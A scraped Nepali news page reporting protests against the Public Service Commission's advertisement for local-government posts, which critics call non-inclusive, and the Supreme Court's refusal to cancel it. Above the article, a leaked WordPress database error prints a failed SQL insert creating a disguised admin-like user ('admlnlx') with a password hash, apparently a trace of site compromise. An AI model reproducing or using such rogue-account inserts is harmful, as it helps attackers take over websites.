WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHV2l29fqGqNYO0X4jA6oUi2f0JYen.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:48:11', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २ साउन, काठमाडौं । लोकसेवाले आयोगले स्थानीय तहमा गरेको विज्ञापन समावेशी र समानुपातिक नभएको भन्दै लोक सेवा आयोगको केन्द्रीय कार्यालय अगाडि आज बिहान प्रदर्शन गरेका छन ।
आयोगले गत असारमा गरेको विज्ञापनको बिरुदमा आरक्षण बचाउ समितिले चरान्बद आन्दोलन गर्दै आएको छ ।
संघीय मामिला तथा सामान्य प्रशासन मन्त्रालयको सिफारिसमा लोक सेवा आयोगले गत असारमा स्थानीय तहका विभिन्न पदमा ९१३१ कर्मचारी माग गरेको थियो ।
लोक सेवाको खुला विज्ञापनसँगै आदिवासी जनजाति महासंघलगायतका विभिन्न संघ–संगठनहरू रुष्ट छन् । अहिलेको विज्ञापन खारेज गर्दै समावेशी, समानुपातिक सिद्धान्तका आधारमा पुनः विज्ञापन गर्नुपर्ने माग गर्दै आन्दोल चलिरहेको छ ।
यो मामला सर्वोच्च अदालतमा समेत पुगेको थियो । सर्वोच्चले विज्ञापन खारेज गर्न नपर्ने फैसला गरेपछि लोक सेवा आयोग परीक्षा सञ्चालनको तयारीमा छ । यसअन्तर्गत शुक्रबारबाट परीक्षा सुरु हुँदैछ ।
https://gaulenews.com/?p=47198
https://gaulenews.com/?p=47198